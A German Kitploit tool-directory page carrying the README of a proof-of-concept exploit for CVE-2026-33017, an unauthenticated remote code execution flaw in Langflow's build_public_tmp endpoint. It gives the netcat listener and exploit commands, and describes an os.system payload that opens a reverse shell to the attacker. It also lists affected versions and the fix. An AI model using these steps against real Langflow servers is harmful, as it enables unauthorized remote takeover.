Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-33017 — Python POC, Exploit for CVE-2026-33017 | Kitploit
Tools/GitHubGitHub/c0gnit00/cve-2026-33017
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubc0gnit00/cve-2026-33017

CVE-2026-33017

Python POC, Exploit for CVE-2026-33017

Repository anzeigen
2vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-33017 - Langflow Nicht authentifizierte RCE

⚠️ HAFTUNGSAUSSCHLUSS: Dieses Repository dient nur autorisierten Sicherheitstests und Bildungszwecken. Verwenden Sie es nur auf Systemen, die Ihnen gehören oder für die Sie ausdrückliche Erlaubnis zum Testen haben. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

Übersicht

CVE-2026-33017 ist eine nicht authentifizierte Schwachstelle zur Remotecodeausführung in Langflow, einem visuellen Framework zum Erstellen von LangChain-Anwendungen.

Der Endpunkt POST /api/v1/build_public_tmp/{flow_id}/flow ermöglicht das Erstellen öffentlicher Flows ohne Authentifizierung. Wenn der optionale Parameter data angegeben wird, verwendet der Endpunkt vom Angreifer kontrollierte Flow-Daten (die beliebigen Python-Code in Knotendefinitionen enthalten) anstelle der gespeicherten Flow-Daten aus der Datenbank. Dieser Code wird ohne Sandboxing an exec() übergeben, was zu einer nicht authentifizierten Remotecodeausführung führt.

Betroffene Versionen

  • Langflow <= 1.7.3
  • Behoben in Langflow >= 1.8.2

Voraussetzungen für die Ausnutzung

  1. Die Ziel-Langflow-Instanz hat mindestens einen öffentlichen Flow (üblich für Demos, Chatbots, freigegebene Workflows)
  2. Der Angreifer kennt die UUID des öffentlichen Flows (ermittelbar über freigegebene Links/URLs)
  3. Keine Authentifizierung erforderlich — nur ein client_id-Cookie (ein beliebiger Zeichenfolgenwert)

Installation

root@kitploit:~
git clone https://github.com/<your-username>/CVE-2026-33017.git
cd CVE-2026-33017
pip install requests

Verwendung

1. Einen Listener einrichten

Starten Sie auf Ihrem Angriffsrechner einen Netcat-Listener, um die Reverse Shell abzufangen:

root@kitploit:~
nc -lvnp 4444

2. Den Exploit ausführen

root@kitploit:~
python3 CVE-2026-33017.py --url http://target:7860 --flow-id <UUID> --lhost <YOUR_IP> --lport 4444

Argumente

Beispiel

root@kitploit:~
# Terminal 1: Listener starten
nc -lvnp 4444

# Terminal 2: Exploit ausführen
python3 CVE-2026-33017.py \
    --url http://192.168.1.100:7860 \
    --flow-id 550e8400-e29b-41d4-a716-446655440000 \
    --lhost 10.0.0.5 \
    --lport 4444

Funktionsweise

  1. craft_malicious_node() — Erstellt einen bösartigen Langflow-Knoten, der eine CustomComponent mit vom Angreifer kontrolliertem Python-Code enthält. Der Code enthält einen os.system()-Aufruf auf oberster Ebene, der während der Graphkonstruktion ausgeführt wird (bevor der Flow überhaupt „läuft“).

  2. fire_payload() — Sendet den bösartigen Knoten als JSON an den nicht authentifizierten Endpunkt build_public_tmp mit einem zufälligen client_id-Cookie.

  3. Codeausführung — Der Server analysiert die vom Angreifer bereitgestellten Flow-Daten, instanziiert die benutzerdefinierte Komponente und ruft exec() für den eingebetteten Code während prepare_global_scope() auf. Die Zuweisung auf oberster Ebene _r = __import__('os').system(...) löst sofort die Befehlsausführung aus.

  4. Reverse Shell — Die Nutzlast erzeugt eine Python-Reverse-Shell, die eine Verbindung zu Ihrem Listener herstellt.

Schwachstellendetails

Grundursache

Der Endpunkt build_public_tmp ist für den nicht authentifizierten Zugriff konzipiert (für öffentliche Flows), akzeptiert jedoch fälschlicherweise vom Angreifer bereitgestellte Flow-Daten über den Parameter data. Wenn data bereitgestellt wird, umgeht er die gespeicherten Flow-Daten und übergibt vom Angreifer kontrollierte Knoten direkt an den Graph-Builder.

Empfohlene Korrektur

Entfernen Sie den Parameter data aus build_public_tmp. Öffentliche Flows sollten nur ihre gespeicherten Flow-Daten aus der Datenbank ausführen, niemals vom Angreifer bereitgestellte Daten.

Referenzen

  • NVD - CVE-2026-33017
  • Langflow Release 1.8.2

Lizenz

Dieses Projekt wird nur für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt.

Tool herunterladen
ArgumentErforderlichBeschreibung
--urlJaZiel-URL (z. B. http://localhost:7860)
--flow-idJaUUID des öffentlichen Flows
--lhostJaIhre Listener-IP-Adresse
--lportJaIhr Listener-Port
--timeoutNeinTimeout für Anfragen in Sekunden (Standard: 15)